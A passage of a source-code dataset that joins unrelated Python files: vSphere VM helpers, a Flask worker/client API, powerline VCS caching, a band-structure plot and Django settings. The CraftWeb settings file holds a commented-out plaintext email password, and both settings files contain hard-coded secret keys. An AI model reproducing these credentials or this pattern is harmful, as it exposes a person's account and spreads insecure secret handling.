            # BUGFIX: the original had a trailing comma here, which stored a
            # 1-tuple ('text',) instead of the question text string.
            info['Question'] = runtime.question.text
        return info

    def hardware(self):
        return self.vm.config.hardware

    def host_name(self):
        return self.guest().hostName

    def ip(self):
        return self.guest().ipAddress

    def name(self):
        return self.config().name

    def moid(self):
        return self.vm._moId

    def powered_state(self):
        return self.runtime().powerState

    def power_on(self):
        return self.task().power_on()

    def power_off(self):
        return self.task().power_off()

    def powered_on(self):
        return self.powered_state() == 'poweredOn'

    def powered_off(self):
        return self.powered_state() == 'poweredOff'

    def screenshot(self, target_file=None):
        # Local import to avoid a circular dependency (VM_Screenshot imports VM).
        from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
        return VM_Screenshot(self, target_file=target_file).download()

    def send_text(self, text):
        VM_Keystroke(self).send_text(text)
        return self

    def send_key(self, text):
        VM_Keystroke(self).send_key(text)
        return self

    def send_enter(self):
        VM_Keystroke(self).enter()
        return self

    def summary(self):
        return self.vm.summary  # will make REST call to RetrievePropertiesEx

    def task(self):
        # Local import due to circular dependency (VM_Task imports VM).
        from k8_vmware.vsphere.VM_Task import VM_Task
        return VM_Task(self)

    def runtime(self):
        return self.vm.summary.runtime

    def uuid(self):
        return self.config().uuid

    def wait(self, seconds):
        # Fluent helper: sleep, then return self for chaining.
        wait(seconds)
        return self

    def __str__(self):
        return f'[VM] {self.name()}'
|
[
"dinis.cruz@owasp.org"
] |
dinis.cruz@owasp.org
|
4aa11ff5954703255ef2662ebc7538a8a164e33c
|
0eb6c70503c680ebec415016ff1b0cfac92486ca
|
/lincdm/views/sitemap.py
|
f33aa93f833be7422fb0e7b0f58bb61365b8d717
|
[] |
no_license
|
alexliyu/lincdm
|
c8b473946f59aca9145b3291890635474f144583
|
eab93285f0b03217ea041a7910edae7e00095cd8
|
refs/heads/master
| 2020-12-30T10:50:05.248988
| 2011-08-09T15:52:38
| 2011-08-09T15:52:38
| 1,464,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 465
|
py
|
"""Views for entry sitemap"""
from django.views.generic.simple import direct_to_template
from lincdm.entry.models import Entry
from lincdm.entry.models import Category
def sitemap(*ka, **kw):
    """Render the sitemap template with fresh entry/category querysets.

    Thin wrapper around ``direct_to_template`` that overwrites any caller
    supplied ``extra_context`` so the listings are always current.
    """
    context = {
        'entries': Entry.published.all(),
        'categories': Category.tree.all(),
    }
    kw['extra_context'] = context
    return direct_to_template(*ka, **kw)
|
[
"alexliyu2012@gmail.com"
] |
alexliyu2012@gmail.com
|
a0d7dc6aad5a1fd9f719eb435d819dfdcb3064b5
|
70645d514c24bee0bb02754d43242f4e2c591e42
|
/sgschema/entity.py
|
ab827a53711279a7a154729a1625e824bf587eb5
|
[] |
no_license
|
westernx/sgschema
|
a0aa6e876dc2b20adc998cd5a2aadad4df4d3b55
|
54df94aa5f4c4ae3f78da20380e824231813e8f6
|
refs/heads/master
| 2020-12-24T16:06:27.689021
| 2016-04-12T19:10:43
| 2016-04-12T19:10:43
| 42,960,601
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
from .field import Field
class Entity(object):
    """Schema node describing one entity type and its fields."""

    def __init__(self, schema, name):
        self.schema = schema        # owning Schema object
        self.name = name            # entity type name, e.g. "Shot"
        self.fields = {}            # field name -> Field
        self.field_aliases = {}     # alias -> canonical field name
        self.field_tags = {}        # tag -> field names

    def _get_or_make_field(self, name):
        """Return the named Field, creating it on first access."""
        try:
            return self.fields[name]
        except KeyError:
            return self.fields.setdefault(name, Field(self, name))

    def _reduce_raw(self, schema, raw_entity):
        # Hook for raw-schema reduction; intentionally a no-op here.
        pass

    def _dump(self):
        """Serialize to a dict, omitting empty collections."""
        return dict((k, v) for k, v in (
            ('fields', self.fields),
            ('field_aliases', self.field_aliases),
            ('field_tags', self.field_tags),
        ) if v)

    def _load(self, raw):
        """Merge a raw dict (as produced by _dump) into this entity.

        Note that `raw` is mutated (known keys are popped); raises
        ValueError if unknown keys remain.
        """
        # .items() instead of the Python-2-only .iteritems() so this also
        # runs on Python 3 (works identically on Python 2).
        for name, value in raw.pop('fields', {}).items():
            self._get_or_make_field(name)._load(value)
        self.field_aliases.update(raw.pop('field_aliases', {}))
        self.field_tags.update(raw.pop('field_tags', {}))
        if raw:
            raise ValueError('unknown entity keys: %s' % ', '.join(sorted(raw)))
|
[
"westernx@mikeboers.com"
] |
westernx@mikeboers.com
|
46c18773851d9d50911af3f748b4d8451a0762f9
|
e9fa63cc09969ac8f01c185ec5e368ff0b682c42
|
/powerline/powerline/lib/vcs/__init__.py
|
8666f2bf862071b32e9faba1f11a69be8a882675
|
[
"MIT"
] |
permissive
|
harrisjb/dots
|
56ff6248e4edd92e4d62768b0ad6f844ca97079e
|
766be30cb172770bc032f49166bf13fab94e0be8
|
refs/heads/master
| 2021-01-10T21:38:21.528214
| 2014-02-28T16:03:08
| 2014-02-28T16:03:27
| 17,290,180
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,738
|
py
|
# vim:fileencoding=utf-8:noet
from __future__ import absolute_import
import os, errno
from threading import Lock
from collections import defaultdict
vcs_props = (
('git', '.git', os.path.exists),
('mercurial', '.hg', os.path.isdir),
('bzr', '.bzr', os.path.isdir),
)
def generate_directories(path):
    """Yield `path` (only if it is an existing directory) followed by each
    ancestor directory up to the filesystem root."""
    if os.path.isdir(path):
        yield path
    while True:
        parent = os.path.dirname(path)
        # Stop at the root (dirname is a fixed point) or an empty result.
        if parent == path or not parent:
            break
        path = parent
        yield path
# Lazily-created process-wide singleton watcher instance.
_file_watcher = None
def file_watcher():
    """Return the shared file watcher, creating it on first use.

    The import is deferred so merely importing this module does not pull
    in the file_watcher machinery.
    """
    global _file_watcher
    if _file_watcher is None:
        from powerline.lib.file_watcher import create_file_watcher
        _file_watcher = create_file_watcher()
    return _file_watcher
branch_name_cache = {}
branch_lock = Lock()
file_status_lock = Lock()
def get_branch_name(directory, config_file, get_func):
    """Return the branch name for the repo at *directory*, with caching.

    *config_file* is the VCS file naming the branch (e.g. .git/HEAD) and is
    the cache key; *get_func(directory, config_file)* computes the name on a
    miss.  File watches detect repo moves/deletions and config changes so
    the cached name is refreshed only when needed.
    """
    global branch_name_cache
    with branch_lock:
        # Check if the repo directory was moved/deleted
        fw = file_watcher()
        is_watched = fw.is_watched(directory)
        try:
            changed = fw(directory)
        except OSError as e:
            if getattr(e, 'errno', None) != errno.ENOENT:
                raise
            # Directory is gone: treat it as changed so the stale entry drops.
            changed = True
        if changed:
            branch_name_cache.pop(config_file, None)
            # Remove the watches for this repo
            if is_watched:
                fw.unwatch(directory)
                fw.unwatch(config_file)
        else:
            # Check if the config file has changed
            try:
                changed = fw(config_file)
            except OSError as e:
                if getattr(e, 'errno', None) != errno.ENOENT:
                    raise
                # Config file does not exist (happens for mercurial)
                if config_file not in branch_name_cache:
                    branch_name_cache[config_file] = get_func(directory, config_file)
        if changed:
            # Config file has changed or was not tracked
            branch_name_cache[config_file] = get_func(directory, config_file)
        return branch_name_cache[config_file]
class FileStatusCache(dict):
    """Cache of per-file VCS status with reverse maps for invalidation.

    Maps file path -> status.  dirstate_map and ignore_map record which
    cached paths depend on a given dirstate file (e.g. .git/index) or
    ignore file (e.g. .gitignore), so those entries can be dropped when
    that file changes.
    """
    def __init__(self):
        self.dirstate_map = defaultdict(set)
        self.ignore_map = defaultdict(set)
        # keypath -> set of ignore files that may affect its status.
        self.keypath_ignore_map = {}
    def update_maps(self, keypath, directory, dirstate_file, ignore_file_name, extra_ignore_files):
        """Register *keypath* and every ignore file that may affect it."""
        # Collect an ignore file for every directory from keypath's own
        # directory up to (and including) the repository root *directory*.
        # BUG FIX: the walk must ascend from *parent*; the original used
        # os.path.dirname(keypath), which never advances, so only the file's
        # immediate directory was covered and intermediate ignore files
        # were never tracked.
        parent = keypath
        ignore_files = set()
        while parent != directory:
            nparent = os.path.dirname(parent)
            if nparent == parent:
                # Reached the filesystem root without meeting *directory*.
                break
            parent = nparent
            ignore_files.add(os.path.join(parent, ignore_file_name))
        for f in extra_ignore_files:
            ignore_files.add(f)
        self.keypath_ignore_map[keypath] = ignore_files
        for ignf in ignore_files:
            self.ignore_map[ignf].add(keypath)
        self.dirstate_map[dirstate_file].add(keypath)
    def invalidate(self, dirstate_file=None, ignore_file=None):
        """Drop every cached status that depends on the given file(s)."""
        for keypath in self.dirstate_map[dirstate_file]:
            self.pop(keypath, None)
        for keypath in self.ignore_map[ignore_file]:
            self.pop(keypath, None)
    def ignore_files(self, keypath):
        """Yield the ignore files previously registered for *keypath*."""
        for ignf in self.keypath_ignore_map[keypath]:
            yield ignf
file_status_cache = FileStatusCache()
def get_file_status(directory, dirstate_file, file_path, ignore_file_name, get_func, extra_ignore_files=()):
    """Return the VCS status of *file_path*, cached and watch-invalidated.

    *get_func(directory, file_path)* computes the status on a miss.  The
    cached value is refreshed when the dirstate file (e.g. .git/index), the
    file itself, or any applicable ignore file is observed to change.
    """
    global file_status_cache
    keypath = file_path if os.path.isabs(file_path) else os.path.join(directory, file_path)
    file_status_cache.update_maps(keypath, directory, dirstate_file, ignore_file_name, extra_ignore_files)
    with file_status_lock:
        # Optimize case of keypath not being cached
        if keypath not in file_status_cache:
            file_status_cache[keypath] = ans = get_func(directory, file_path)
            return ans
        # Check if any relevant files have changed
        file_changed = file_watcher()
        changed = False
        # Check if dirstate has changed
        try:
            changed = file_changed(dirstate_file)
        except OSError as e:
            if getattr(e, 'errno', None) != errno.ENOENT:
                raise
            # The .git index file does not exist for a new git repo
            return get_func(directory, file_path)
        if changed:
            # Remove all cached values for files that depend on this
            # dirstate_file
            file_status_cache.invalidate(dirstate_file=dirstate_file)
        else:
            # Check if the file itself has changed
            try:
                changed ^= file_changed(keypath)
            except OSError as e:
                if getattr(e, 'errno', None) != errno.ENOENT:
                    raise
                # Do not call get_func again for a non-existant file
                if keypath not in file_status_cache:
                    file_status_cache[keypath] = get_func(directory, file_path)
                return file_status_cache[keypath]
            if changed:
                file_status_cache.pop(keypath, None)
            else:
                # Check if one of the ignore files has changed
                for ignf in file_status_cache.ignore_files(keypath):
                    try:
                        changed ^= file_changed(ignf)
                    except OSError as e:
                        if getattr(e, 'errno', None) != errno.ENOENT:
                            raise
                    if changed:
                        # Invalidate cache for all files that might be affected
                        # by this ignore file
                        file_status_cache.invalidate(ignore_file=ignf)
                        break
    # Re-read (or recompute) outside the invalidation branch: an entry popped
    # above falls through to the KeyError path and is recomputed.
    try:
        return file_status_cache[keypath]
    except KeyError:
        file_status_cache[keypath] = ans = get_func(directory, file_path)
        return ans
class TreeStatusCache(dict):
    """Cache of whole-tree VCS status keyed by repository directory.

    A TreeWatcher invalidates an entry when anything under the repo changes.
    """
    def __init__(self):
        from powerline.lib.tree_watcher import TreeWatcher
        self.tw = TreeWatcher()
    def cache_and_get(self, key, status):
        """Return the cached value for *key*, computing it via *status*() on a miss."""
        # *self* doubles as a sentinel so that falsy cached values (None, '')
        # are still treated as hits.
        ans = self.get(key, self)
        if ans is self:
            ans = self[key] = status()
        return ans
    def __call__(self, repo, logger):
        key = repo.directory
        try:
            if self.tw(key, logger=logger, ignore_event=getattr(repo, 'ignore_event', None)):
                self.pop(key, None)
        except OSError as e:
            # BUG FIX: the format arguments must be a tuple.  The original
            # applied '%' to *key* alone and passed *e* as a spurious second
            # positional to warn(), so this line raised TypeError instead of
            # logging the warning.
            logger.warn('Failed to check %s for changes, with error: %s' % (key, e))
        return self.cache_and_get(key, repo.status)
_tree_status_cache = None
def tree_status(repo, logger):
    """Return *repo*'s tree-wide status via the lazily created module cache."""
    global _tree_status_cache
    cache = _tree_status_cache
    if cache is None:
        cache = _tree_status_cache = TreeStatusCache()
    return cache(repo, logger)
def guess(path):
    """Return a Repository object for the VCS controlling *path*, or None.

    Walks from *path* upward looking for a .git/.hg/.bzr marker; the matching
    backend module is imported lazily and memoized in this module's globals.
    """
    for directory in generate_directories(path):
        for vcs, vcs_dir, check in vcs_props:
            repo_dir = os.path.join(directory, vcs_dir)
            if check(repo_dir):
                if os.path.isdir(repo_dir) and not os.access(repo_dir, os.X_OK):
                    # Marker directory exists but is not traversable; skip it.
                    continue
                try:
                    if vcs not in globals():
                        globals()[vcs] = getattr(__import__('powerline.lib.vcs', fromlist=[vcs]), vcs)
                    return globals()[vcs].Repository(directory)
                except Exception:
                    # Best-effort: an unusable backend must not break the
                    # caller.  FIX: narrowed from a bare `except:` so that
                    # KeyboardInterrupt/SystemExit still propagate.
                    pass
    return None
def debug():
    ''' To use run python -c "from powerline.lib.vcs import debug; debug()" some_file_to_watch '''
    # Interactive helper: repeatedly prints the branch/status of the target
    # path until Ctrl-C (or EOF on stdin) ends the loop.
    import sys
    dest = sys.argv[-1]
    repo = guess(os.path.abspath(dest))
    if repo is None:
        print ('%s is not a recognized vcs repo' % dest)
        raise SystemExit(1)
    print ('Watching %s' % dest)
    print ('Press Ctrl-C to exit.')
    try:
        while True:
            if os.path.isdir(dest):
                print ('Branch name: %s Status: %s' % (repo.branch(), repo.status()))
            else:
                print ('File status: %s' % repo.status(dest))
            # NOTE(review): raw_input is Python 2 only — on Python 3 this
            # raises NameError (would need input()); the module otherwise
            # targets Python-2-era powerline.
            raw_input('Press Enter to check again: ')
    except KeyboardInterrupt:
        pass
    except EOFError:
        pass
|
[
"jharris@peopleadmin.com"
] |
jharris@peopleadmin.com
|
aa953a7d03b633cf3ae233b5c331b067e916dc29
|
6ccea6f389fb13f1469a4f75c720db91592395bb
|
/venv/bin/dotenv
|
a779e56f69dded9b4b4e354736ed9d4d4ac1bd44
|
[] |
no_license
|
JessicaBPerez/Flask-Project
|
a8ea5c147c98fbd0b5991453612d1f1d1e572b4c
|
98351b23cfdc7009504a1e1ebd7baeb55e6fc8df
|
refs/heads/master
| 2022-12-26T21:08:37.647859
| 2019-09-27T14:23:28
| 2019-09-27T14:23:28
| 211,336,289
| 0
| 1
| null | 2022-12-13T23:38:59
| 2019-09-27T14:22:21
|
Python
|
UTF-8
|
Python
| false
| false
| 257
|
#!/Users/jessicaperez/treehouse/flask-s3-browser/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from dotenv.cli import cli
if __name__ == '__main__':
    # Console-script shim: strip setuptools' "-script.pyw"/".exe" suffix from
    # argv[0] so usage/help output shows the plain command name, then hand
    # control to the dotenv CLI and exit with its return code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(cli())
|
[
"jessicaperez@Jessicas-MacBook-Pro-2.local"
] |
jessicaperez@Jessicas-MacBook-Pro-2.local
|
|
9a6d7093b0ded82b5b610224adbf3fcff552c51b
|
ecad74f53abefd26d39359293237fa6fcb098fd3
|
/apps/restApi/app/worker/client/clientController.py
|
bb39c5389d91982964197ebf1922024c84221a2b
|
[
"MIT"
] |
permissive
|
JaeYoung1994/Integrated-solution-management-admin-web
|
d7a923bcd251cf750b47653a60c62620ae9679b5
|
481cfa2bc206db9bd7ff3b534eba64f148dda2d4
|
refs/heads/master
| 2023-04-05T10:17:51.604195
| 2021-04-01T16:37:45
| 2021-04-01T16:38:03
| 353,096,275
| 1
| 0
| null | 2021-03-31T01:42:03
| 2021-03-30T18:05:23
|
Python
|
UTF-8
|
Python
| false
| false
| 3,543
|
py
|
import copy
from flask import request
from flask_restx import Resource, Namespace, fields
from model.redis.worker.client.clientRedis import ClientRedis
from common.utils import Utils
from common.code import ReqCode, CommonCode
ra_worker_client = Namespace(
name='worker_client',
description='Worker to client API'
)
@ra_worker_client.route('/sync/clients')
class worker_client_sync_clients(Resource):
    def post(self):
        """Synchronize the calling worker's client list into Redis.

        Clients previously attributed to the caller but absent from the
        request are deleted; every client in the request is (re)registered.
        """
        status = 200
        try:
            payload = request.json
            if not Utils.isDicHasKey(payload, ['data']):
                return ReqCode.notKey.value, 400
            worker_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
            client_redis = ClientRedis()
            registered = client_redis.getClient()
            # Clients currently attributed to this worker...
            attributed = [ip for ip in registered if registered[ip] == worker_ip]
            # ...are dropped when the request no longer lists them.
            for ip in attributed:
                if ip not in payload['data']:
                    client_redis.deleteClient(ip)
            for ip in payload['data']:
                client_redis.registClient(worker_ip, ip)
            body = {"result": True}
        except Exception as ex:
            body = copy.deepcopy(CommonCode.UnknownError.value)
            body["msg"] = str(ex)
            status = 400
        return body, status
@ra_worker_client.route('/get/clients')
class worker_client_get_clients(Resource):
    def post(self):
        """Return every registered client -> worker mapping from Redis."""
        status = 200
        try:
            # Parsed but unused — kept for parity with the original, since
            # accessing request.json may itself raise on malformed bodies.
            _ = request.json
            body = {"result": True, "data": ClientRedis().getClient()}
        except Exception as ex:
            body = copy.deepcopy(CommonCode.UnknownError.value)
            body["msg"] = str(ex)
            status = 400
        return body, status
@ra_worker_client.route('/sync/clients/device')
class worker_client_sync_device(Resource):
    def post(self):
        """Register the device list reported for a single client IP."""
        status = 200
        try:
            payload = request.json
            required = ['ip', 'data']
            # Validate presence first, then non-null values (same call order
            # as before: both checks run before either early return).
            has_keys = Utils.isDicHasKey(payload, required)
            values_ok = Utils.isDicKeyValueNull(payload, required)
            if not has_keys:
                return ReqCode.notKey.value, 400
            if not values_ok:
                return ReqCode.keyValNull.value, 400
            ClientRedis().registClientDevice(payload['ip'], payload['data'])
            body = CommonCode.Success.value
        except Exception as ex:
            body = copy.deepcopy(CommonCode.UnknownError.value)
            body["msg"] = str(ex)
            status = 400
        return body, status
@ra_worker_client.route('/get/clients/device')
class worker_client_get_clients_device(Resource):
    def post(self):
        """Return every registered client-device mapping from Redis."""
        status = 200
        try:
            # Parsed but unused — kept for parity with the original, since
            # accessing request.json may itself raise on malformed bodies.
            _ = request.json
            body = {"result": True, "data": ClientRedis().getClientDevice()}
        except Exception as ex:
            body = copy.deepcopy(CommonCode.UnknownError.value)
            body["msg"] = str(ex)
            status = 400
        return body, status
|
[
"shiptroll@gmail.com"
] |
shiptroll@gmail.com
|
f20a18ba8049e30bb628330e99bb1aa9e3c05778
|
1643eab131031cde6a9e87937cf255bc12942603
|
/DFT/silicon_SCAN_KIH/09-inteqp/plot_inteqp.py
|
a5ddabe05a2657ecc5115960fc918beb1ed3bd87
|
[] |
no_license
|
BerkeleyGW/BerkeleyGW-examples
|
619cfc7cef20768c9cfb21d770a5f95562050a57
|
df3fdd910b4b5f8e61e292bc25a75d5d2a96f67a
|
refs/heads/master
| 2021-06-07T20:44:27.534328
| 2021-06-06T05:16:17
| 2021-06-06T05:16:17
| 157,264,924
| 8
| 8
| null | 2021-06-06T05:16:18
| 2018-11-12T19:29:09
|
Standard ML
|
UTF-8
|
Python
| false
| false
| 1,525
|
py
|
#!/usr/bin/env python
#coding: utf-8
# This scripts plots the GW bandstructure of Si interpolated with the inteqp code.
# It reads the bandstructure.dat file from the inteqp.real.x code, and produces
# the output file "bandstructure_inteqp.pdf".
#
# Felipe H. da Jornada, UC Berkeley (2016)
import numpy as np
import matplotlib as mpl
#mpl.use('Agg')
import matplotlib.pyplot as plt
# bandstructure.dat columns used here: 1 = band index, 2:5 = (kx, ky, kz),
# 5 = mean-field energy, 6 = quasiparticle energy.  (Column 0 is unused —
# its meaning is not established by this script; confirm against inteqp docs.)
data = np.loadtxt('bandstructure.dat')
bands = data[:,1]
kpts = data[:,2:5]
emf = data[:,5]
eqp = data[:,6]
# Shift both energy scales so the maximum of band 4 (the valence-band
# maximum for Si — presumably; TODO confirm) sits at 0 eV.
emf -= np.amax(emf[bands==4])
eqp -= np.amax(eqp[bands==4])
def get_x(ks):
    """Cumulative arc length along the k-point path *ks* (shape (n, 3)).

    Returns an array of length n starting at 0, where x[i] is the summed
    Euclidean distance between consecutive k-points up to index i.
    """
    segment_lengths = np.linalg.norm(np.diff(ks, axis=0), axis=1)
    return np.concatenate(([0.], np.cumsum(segment_lengths)))
# Plot each band as one polyline while tracking the overall x-range for xlim.
xmin, xmax = np.inf, -np.inf
# FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the builtin
# int is the documented replacement and behaves identically here.
bands_uniq = np.unique(bands).astype(int)
for ib in bands_uniq:
    cond = bands==ib
    x = get_x(kpts[cond])
    xmin, xmax = min(xmin, x[0]), max(xmax, x[-1])
    # Dashed blue: mean-field (SCAN) energies; solid red: GW quasiparticle.
    lmf, = plt.plot(x, emf[cond], '--', color='b', lw=1.5, zorder=2)
    lqp, = plt.plot(x, eqp[cond], '-', color='r', lw=1.5, zorder=1)
def to_mathrm(s):
    """Wrap *s* in LaTeX math-mode \\mathrm{} for use as a tick label."""
    return r'$\mathrm{{{0}}}$'.format(s)
# Indices of the high-symmetry points W-L-Gamma-X-W-K along the k-path.
# NOTE(review): hard-coded for this particular k-point sampling, and `x`
# here is whatever array was left by the final loop iteration above —
# this relies on every band sharing the same k-path; confirm.
ind = [0, 45, 95, 145, 173, 199]
# NOTE(review): under Python 3 map() returns an iterator; list(...) would be
# the safer argument if matplotlib ever requires a sequence — confirm.
plt.xticks(x[ind], map(to_mathrm, ['W', 'L', r'\Gamma', 'X', 'W', 'K']))
for idx in ind:
    plt.axvline(x[idx], color='k')
plt.title('Si bandstructure: inteqp.real.x code')
# Horizontal guide at 0 eV (the energy zero set at the band-4 maximum above).
plt.axhline(0, color='#cccccc', zorder=-10)
plt.xlim(xmin, xmax)
plt.ylim(-12.5, 7.5)
plt.legend([lmf, lqp], ['SCAN', 'GW'], loc='lower right')
plt.ylabel('Energy (eV)')
plt.savefig('bandstructure_inteqp.pdf')
|
[
"zhaofangzhou@berkeley.edu"
] |
zhaofangzhou@berkeley.edu
|
20de67c990dce38433d7243d2f07868697593df2
|
ebf6fb4414fb5c304dad1234fc910e3298034322
|
/CraftWeb/CraftWeb/settings.py
|
99b20e77ba57f4884111f83bea680c144bb9deef
|
[] |
no_license
|
MSVarshini/CarftWeb
|
7b4d9543623759bc8d4e0f1f32a87ff3d60eeb77
|
998bb5967f59cc9bf6fd2fdec6dc232f449b1f86
|
refs/heads/master
| 2023-08-06T23:37:12.694097
| 2021-10-08T07:00:24
| 2021-10-08T07:00:24
| 377,435,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,648
|
py
|
"""
Django settings for CraftWeb project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded; load it from the environment before
# deploying anywhere real.
SECRET_KEY = 'django-insecure-(c7v8sxot^3(u8oa683wjnaob8r6y!t(488e*x@6kr4bzqx=ib'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# SMTP settings kept for reference only; the console email backend further
# down is the one actually in effect.
# EMAIL_HOST = 'smtppro.zoho.in'
# EMAIL_HOST_USER = 'msvarshini2001@gmail.com'
# EMAIL_HOST_PASSWORD = 'varshu777'
# EMAIL_PORT = 587
# EMAIL_USE_TLS = True
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'Toys',  # project app
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CraftWeb.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'CraftWeb.wsgi.application'
# Authentication uses the project's custom user model.
AUTH_USER_MODEL="Toys.Customer"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# NOTE(review): an empty ALLOWED_HOSTS only works while DEBUG=True; set the
# real host names before deploying.
ALLOWED_HOSTS = []
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Emails are printed to the console (development backend).
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR,'Toys/assets'),
)
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"msvarshini2017@gmail.com"
] |
msvarshini2017@gmail.com
|
0584747d8f65280307db8e8f7a973bf9d702eb19
|
39f1ae1e3b95d717f6d103b3ac534b468090c36f
|
/py_blackbox_backend/py_blackbox_backend/settings.py
|
52046da510da0ace923632f0a9d29badf4aa06f4
|
[] |
no_license
|
arron1993/blackbox.arron.id
|
5d532af4e9557986f8af5c9018d9d789bbd03470
|
4da60f3dd524bd0afbdc3613767a818bcab1cd8d
|
refs/heads/master
| 2023-05-04T05:19:15.792063
| 2021-05-20T20:34:28
| 2021-05-20T20:34:28
| 346,052,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,974
|
py
|
"""
Django settings for py_blackbox_backend project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import datetime
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Falls back to a hard-coded development key when DJANGO_SECRET_KEY is unset.
SECRET_KEY = os.environ.get(
    'DJANGO_SECRET_KEY',
    '9qyc-ncc0jq(y*4y6j4w88bffe!isuzf)1e0*sxu4w1d=k4xxo')
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG is on unless DJANGO_DEBUG is exactly the string 'False'
# (i.e. an unset variable also enables debug mode).
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'
# NOTE(review): wildcard host list; restrict before production.
ALLOWED_HOSTS = ['*']
# Every DRF request authenticates with a JWT bearer token.
REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': [
        'rest_framework_simplejwt.authentication.JWTAuthentication',
    ],
}
SIMPLE_JWT = {
    "ACCESS_TOKEN_LIFETIME": datetime.timedelta(days=7),
    "REFRESH_TOKEN_LIFETIME": datetime.timedelta(days=14),
}
INSTALLED_APPS = [
    'fuel.apps.FuelConfig',
    'circuit.apps.CircuitConfig',
    'car.apps.CarConfig',
    'session.apps.SessionConfig',
    'session_type.apps.SessionTypeConfig',
    'metrics.apps.MetricsConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'py_blackbox_backend.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'py_blackbox_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# Local SQLite while debugging; PostgreSQL (docker host "db") otherwise.
if DEBUG:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': BASE_DIR / 'db.sqlite3',
        }
    }
else:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': "live-blackbox",
            'USER': 'postgres',
            # NOTE(review): hard-coded production credentials; move to
